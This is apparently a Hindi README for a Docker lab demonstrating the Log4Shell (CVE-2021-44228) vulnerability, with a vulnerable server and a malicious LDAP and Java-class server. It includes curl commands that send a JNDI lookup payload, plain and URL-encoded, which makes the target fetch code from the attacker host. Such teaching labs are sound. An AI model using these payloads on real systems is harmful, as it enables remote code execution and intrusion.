
यह डेमो दिखाता है कि Log4Shell / CVE-2021-44228 भेद्यता कैसे काम करती है
यह प्रोजेक्ट यह प्रदर्शित करने के उद्देश्य से है कि Log4Shell / CVE-2021-44228 कमजोरी कैसे काम करती है।
आपको केवल Docker इंस्टॉल होना आवश्यक है। आदर्श रूप से आपके पास दो अलग-अलग वर्चुअल मशीनें हों। एक असुरक्षित सर्वर के लिए और एक दुर्भावनापूर्ण सर्वर के लिए, जो दुर्भावनापूर्ण कोडबेस और एक LDAP सर्वर होस्ट करेगा।
वैकल्पिक रूप से आपके पास Make और Docker Compose इंस्टॉल हो सकते हैं, लेकिन यह आवश्यक नहीं है क्योंकि इस repo में एक make.sh भी शामिल है जो इन आवश्यकताओं को छोड़कर उन्हें docker कंटेनर के भीतर से उपयोग करने की सुविधा देता है।
यदि आपने पहले से नहीं किया है, तो Debian VM पर Docker इंस्टॉल करने के चरण यहाँ दिए गए हैं। आप इन चरणों का उपयोग कर सकते हैं: https://gist.github.com/mschmnet/5d8c979920801c73e148c901a5989b46
git clone [email protected]:mschmnet/Log4Shell-demo.git
cd vulnerable-server
../make.sh run # Or you coud execute make run if you hade Make and Docker Compose installed
यह दुर्भावनापूर्ण Java क्लासेज़ को सर्व करने के लिए एक बुनियादी LDAP सर्वर और बुनियादी Python सर्वर प्रारंभ करेगा।
आपको IP पता या डोमेन नाम प्रदान करना होगा जहाँ ये सर्वर उपलब्ध होंगे।
cd malicious-server
../make.sh run CODEBASE_URL=SERVER_IP_OR_DOMAIN_NAME # Optionally make instead of ../make.sh if you had Make and Docker Compose installed
curl -X GET -G --data-urlencode 'foo=${jndi:ldap://IP_OR_DOMAIN_MALICIOUS_SERVER:1389/a}' http://IP_OR_DOMAIN_VULNERABLE_SERVER/some-endpoint
या केवल
curl --location --request GET 'http://IP_OR_DOMAIN_VULNERABLE_SERVER/some-endpoint?foo=%24%7Bjndi%3Aldap%3A%2F%2FIP_OR_DOMAIN_MALICIOUS_SERVER%3A1389%2Fa%7D'
जहाँ ${jndi:ldap://IP_OR_DOMAIN_MALICIOUS_SERVER:1389/a} केवल URL एन्कोडेड है।
../make.sh stop
../make.sh logs